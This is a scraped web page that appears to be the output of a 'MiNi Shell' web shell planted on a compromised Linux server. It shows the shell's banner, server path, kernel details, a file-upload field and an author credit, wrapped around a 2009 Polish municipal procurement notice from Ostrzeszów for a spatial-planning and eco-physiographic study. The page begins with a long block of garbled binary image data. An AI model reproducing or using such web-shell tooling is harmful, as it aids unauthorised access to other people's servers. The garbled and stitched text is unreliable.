JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090922/161531-N-2009.html

<p class="kh_header"><b>Ostrzeszów: Opracowanie ekofizjograficzne i projekt zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta i gminy Ostrzeszów</b><br>
<b>Numer ogłoszenia: 161531 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Ostrzeszów , ul. Zamkowa 31, 63-500 Ostrzeszów, woj. wielkopolskie, tel. 062 7320600, faks 062 7320601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrzeszow.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie ekofizjograficzne i projekt zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta i gminy Ostrzeszów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie:


1) opracowania ekofizjograficznego dla studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta i gminy Ostrzeszów zgodnie z rozporządzeniem Ministra Środowiska z dnia 9 września 2002 roku w sprawie opracowań ekofizjograficznych (Dz. U. Nr 155 poz. 1298 z 2002 r.),


2) projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta i gminy Ostrzeszów, zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z 2003 r. z późniejszymi zmianami) wraz ze sporządzeniem prognozy oddziaływania na środowisko oraz przeprowadzeniem strategicznej oceny oddziaływania na środowisko dla tego studium zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz.U. 199 poz. 1227 z 2008 r.  z późniejszymi zmianami).W ramach niniejszej zmiany studium należy wykonać nowe opracowanie tego dokumentu.


2.	Obszar będący przedmiotem opracowania ekofizjografii i zmiany studium obejmuje całe miasto  i gminę Ostrzeszów w jej granicach administracyjnych tj. obszar o powierzchni 18 749 ha (w tym miasto 1 218 ha),  z czego  około 7 298ha(38,9%)  to powierzchnia lasów .Liczba mieszkańców:  23 595 (w tym 14 464 miasto) w dniu 31.12.2008r.Obszar całego miasta i gminy należy  zgodnie z Rozporządzeniem nr 63 Wojewody Kaliskiego  z dnia 7 września 1995r. do Obszaru Chronionego Krajobrazu / Wzgórza Ostrzeszowskie i Kotlina Odolanowska).Podstawą opracowania jest Uchwała Nr XXV/200/09 Rady Miejskiej Ostrzeszów z dnia marca 2009r.

3.	Opracowanie ekofizjograficzne, o którym mowa w pkt. 1. powinno zawierać część tekstową oraz graficzną i w części opisowej i kartograficznej powinno obejmować problematykę określoną  w rozporządzeniu Ministra Środowiska  z dnia 9 września 2002 roku w sprawie opracowań ekofizjograficznych ( Dz. U. Nr 155 poz. 1298 z 2002 r.). Opracowanie winno się składać z części kartograficznej, wykonanej na mapie topograficznej w skali 1:10 000 pozyskanej z państwowego zasobu geodezyjnego. 

4.	Projekt zmiany studium, o którym mowa w pkt. 1 powinien zawierać część tekstową i graficzną sporządzoną  na mapie topograficznej w skali 1:10 000 pozyskanej przez Wykonawcę na swój koszt z państwowego zasobu geodezyjnego. Projekt zmiany studium powinien uwzględniać  wymagania  wynikające z:
- ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym Dz. U. z 2003 r. Nr   80, poz. 717, ze zmianami ),
- rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium  uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz.U.Nr 118 poz.1233 z 2004 r.),
- ustawy z 3.10.2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227 ze zmianami).


5.	Zakres prac planistycznych obejmujących zamówienie jak w pkt. 1. musi uwzględniać wymagania według stanu prawnego obowiązującego na dzień zakończenia wykonania zamówienia.

6.	Sporządzenie prognozy oddziaływania na środowisko winno być poprzedzone uzgodnieniem, z właściwymi organami, stopnia szczegółowości informacji w niej zawartych  i zgodne z wymogami ustawy z dnia 3.10.2008 r. o udostępnianiu informacji  o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227 ze zmianami).


7.	Wykonawca zobowiązany jest wykonać zamówienie zgodnie z przepisami prawa i przy uwzględnieniu postanowień specyfikacji istotnych warunków zamówienia. W przypadku zmiany prawa w trakcie wykonywania zamówienia, Wykonawca zobowiązany jest w ramach niniejszego zamówienia uzupełnić (zmienić) opracowania stanowiące przedmiot zamówienia o niezbędne czynności merytoryczne i formalne mające na celu dostosowanie opracowań do przepisów obowiązujących w dniu zakończenia wykonania zamówienia.

8.	Zamówienie obejmuje wykonanie i dostarczenie Zamawiającemu do jego siedziby, to jest do Urzędu Miasta i Gminy Ostrzeszów ul.Zamkowa 31, 63-500 Ostrzeszów, przedmiotu zamówienia w następujących formach:

1) Opracowanie ekofizjograficzne:
-   dwa egzemplarze ekofizjografii w wersji drukowanej i elektronicznej (2 płyty D); 
-   rysunki, mapy w wersji kolorowej  o rozdzielczości min. 300DPI (do odczytu     
plików *.jpg i wydruku części tekstowej *.doc,  *.pdf,  *.rtf) ;

2) Prognoza oddziaływania na środowisko:
-  dwa egzemplarze prognozy oddziaływania na środowisko w wersji drukowanej 
i elektronicznej (2 płyty CD); 
-  rysunki, mapy w wersji kolorowej  o rozdzielczości min. 300DPI   (do odczytu    plików *.jpg  i wydruku części tekstowej *.doc,  *.pdf, *.rtf);
 

3) Studium uwarunkowań i kierunków zagospodarowania przestrzennego:
-  dwa egzemplarze (kolorowe) planszy rysunku studium do zawieszenia w skali 1:10 000, zafoliowanych lub wydrukowanych na foli, oprawionych w listwy, przystosowanych do zawieszenia na ścianie; 
-   trzy egzemplarze  część tekstowa i graficzna w formie książkowej A-4 (w kolorze);
-  część tekstowa i graficzna  w   wersji elektronicznej (3 płyty CD) o rozdzielczości min. 300DPI (do odczytu plików *.jpg   i wydruku części tekstowej *.doc,  *.pdf,  *.rtf) ;
4) Dokumentacja planistyczna:
-  komplet dokumentacji planistycznej dokumentującej tok formalno-prawny, którą należy opracować  w jednym egzemplarzu w oryginale i dwóch egzemplarzach w kopii.

9.	Przedmiot zamówienia w wersji elektronicznej, o której mowa w pkt. 8:  rozmiar jednego pliku nie może przekraczać 20 MB.


10.	Dla potrzeb prowadzonego postępowania, do  specyfikacji istotnych warunków zamówienia ( zwanej dalej specyfikacją) Zamawiający załącza w wersji elektronicznej:
1/ Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta i gminy,
2/ Miejscowe plany zagospodarowania przestrzennego,
3/ lokalny program rewitalizacji  Ostrzeszowa na lata ; 2006-2015,
4/ plan rozwoju lokalnego Miasta i Gminy Ostrzeszów na lata 2006-2015,
5/ strategię rozwoju Miasta i Gminy Ostrzeszów na lata 2006-2015,
6/ program ochrony środowiska, 
7/ plan gospodarki odpadami, 
8/ program kanalizacji gminy Ostrzeszów,
9/ Wieloletni Plan Inwestycyjny,
10/  Uchwała Nr XXV/200/09 Rady Miejskiej Ostrzeszów z dnia 5 marca 2009r.        w sprawie: przystąpienia do sporządzenia zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Ostrzeszów,
11/ Uchwała Nr XXV/199/2009 Rady Miejskiej Ostrzeszów z dnia 5 marca 2009r.      w sprawie: oceny aktualności Studium uwarunkowań i  kierunków zagospodarowania przestrzennego Miasta i Gminy Ostrzeszów oraz planów miejscowych.

11.	Wymienione w pkt. 10. opracowania i dokumenty zapisane  w wersji elektronicznej na nośniku - płyta CD, stanowią załącznik do specyfikacji.  

12.	Na wniosek Wykonawcy Zamawiający przekaże specyfikację istotnych warunków zamówienia. Załączniki do specyfikacji wymienione w pkt. 10. zostaną przekazane  wykonawcy w wersji elektronicznej na nośniku:  płyta  CD. 


13.	Dla realizacji zamówienia Zamawiający udostępni Wykonawcy do wglądu 
następujące opracowania, będące w posiadaniu Zamawiającego.
1/ Ocena aktualności studium uwarunkowań i kierunków zagospodarowania  przestrzennego oraz miejscowych planów zagospodarowania wraz z analizą zmian w zagospodarowaniu przestrzennym.
2/ Studium Techniczno-Ekonomiczne drogi ekspresowej S-11 na odcinku Autostrada A2 (węzeł  Krzesiny-Ostrów Wielkopolski - Kępno- granica województwa (Byczyna).
3/ mapy ewidencyjne z naniesionymi decyzjami o warunkach zabudowy i zagospodarowania terenu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 16.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zgodnie z art. 22  ust. 1 ustawy - Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:

1.1.  	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek  posiadania takich uprawnień;

1.2. 	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami  zdolnymi do wykonania  zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

Opis warunku: 

a) wykonawca musi wykazać, że wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno opracowanie ekofizjograficzne na potrzeby Studium  i co najmniej jedno Studium uwarunkowań i kierunków zagospodarowania (opracowane w oparciu o ustawę z dnia 27.03.2003 r. o planowaniu i zagospodarowaniu przestrzennym) wraz z prognozą oddziaływania na środowisko, uchwalone uchwałą rady gminy, o obszarze obejmującym całą jednostkę administracyjną - gminę. Wykonanie wymienionych usług musi być potwierdzone dokumentami, że usługi te zostały wykonane należycie,

b) wykonawca musi wykazać, że dysponuje lub będzie dysponował osobą, która będzie uczestniczyć w wykonywaniu zamówienia, tj. urbanistą pełniącym funkcję głównego projektanta, z co najmniej 5 letnim  doświadczeniem w samodzielnym projektowaniu przestrzeni i posiadającym uprawnienia do projektowania w planowaniu przestrzennym i udokumentuje przynależność tej osoby do Izby Urbanistów, jeżeli obowiązek przynależności do izby samorządu zawodowego wynika z innych przepisów;


1.3. 	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

1.4. 	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2.Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:

2.1. Ocena spełniania warunków udziału w postępowaniu wymaganych od Wykonawców zostanie dokonana wg formuły Spełnia - Nie spełnia, na podstawie oświadczeń i dokumentów złożonych przez wykonawców. 

2.2. Warunki udziału w postępowaniu, o których mowa w pkt. 1.2 lit. a) i b) zostaną spełnione przez  wykonawców wspólnie ubiegających się o udzielenie zamówienia, gdy przynajmniej jeden z nich będzie spełniał wymagane warunki bądź warunki te będą.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający  żąda od Wykonawcy następujących oświadczeń i dokumentów: 1.1. oświadczenia wykonawcy,  że nie podlega wykluczeniu z postępowania  na podstawie art. 24 ust. 1 i 2  ustawy z dnia 29 stycznia 2004r.-   Prawo zamówień publicznych (wzór oświadczenia stanowi zał. nr 2 do specyfikacji ); 1.2. oświadczenia wykonawcy o spełnianiu warunków określonych w  art. 22 ust. 1-3  ustawy z dnia 29 stycznia 2004r.-   Prawo zamówień publicznych (wzór oświadczenia stanowi zał. nr 3 do specyfikacji ); 1.3. aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej  niż 6 miesięcy przed upływem terminu składania ofert; 1.4. wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia działalności jest   krótszy - w tym okresie, odpowiadającym swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów  potwierdzających, że te usługi zostały wykonane należycie, (wzór wykazu wykonanych usług stanowi zał. nr 4  do specyfikacji ); 1.5. wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (wzór wykazu osób stanowi załącznik nr 5 do specyfikacji); 1.6. pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych  do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 1.5, wykonawca wskazał osoby, którymi będzie dysponował; 1.7. stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. wymagane uprawnienia i  udokumentuje przynależność tej osoby do właściwej izby samorządu  zawodowego, jeżeli obowiązek przynależności do izby samorządu zawodowego wynika z innych przepisów; 
2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się przepisy § 2 Rozporządzenia Prezesa Rady Ministrów z dnia  19 maja 2006 r. w sprawie   rodzajów dokumentów, jakie może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz.U. z 2006 r. Nr 87, poz. 605 ze zm.), tj. zamiast dokumentu wymienionego w pkt. 1.3. , składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty te powinny być wystawione nie wcześniej  niż 6 miesięcy przed upływem terminu składania ofert. 

3. Dokumenty wymagane w przypadku składania oferty wspólnej przez dwa lub więcej podmiotów: 3.1.	pełnomocnictwo wykonawców wspólnie ubiegających się o udzielenie zamówienia dla podmiotu  uprawnionego do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego, podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów; 3.2. oferta winna zawierać wszystkie wymagane dokumenty, oświadczenia i informacje dla każdego partnera z osobna, za wyjątkiem składanych wspólnie; 3.3. oferta będzie zawierać oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2  ustawy z dnia 29 stycznia 2004 r. -  Prawo zamówień publicznych, składane oddzielnie dla każdego wykonawcy  wspólnie ubiegającego się o udzielenie zamówienia (wzór oświadczenia stanowi zał. nr 2 do specyfikacji); 3.4. oferta będzie zawierać oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1-3 ustawy z dnia 29 stycznia 2004 r. -  Prawo zamówień publicznych (wzór oświadczenia stanowi zał. nr 3 do specyfikacji), składane jako oświadczenie  łączne lub jako oświadczenie oddzielne; 3.5. oferta będzie zawierać dokumenty wymienione w pkt. 1.3. specyfikacji,  oddzielnie dla każdego wykonawcy  wspólnie ubiegającego się o udzielenie zamówienia. 

4. Dokumenty składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez  wykonawcę. 

5.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ostrzeszow.nowoczesnagmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego, tj. Urząd Miasta i Gminy Ostrzeszów ul. Zamkowa 31, 63-500 Ostrzeszów..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2009 godzina 09:00, miejsce: siedziba zamawiającego, tj. Urząd Miasta i Gminy Ostrzeszów ul. Zamkowa 31, 63-500 Ostrzeszów, pok. 64..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com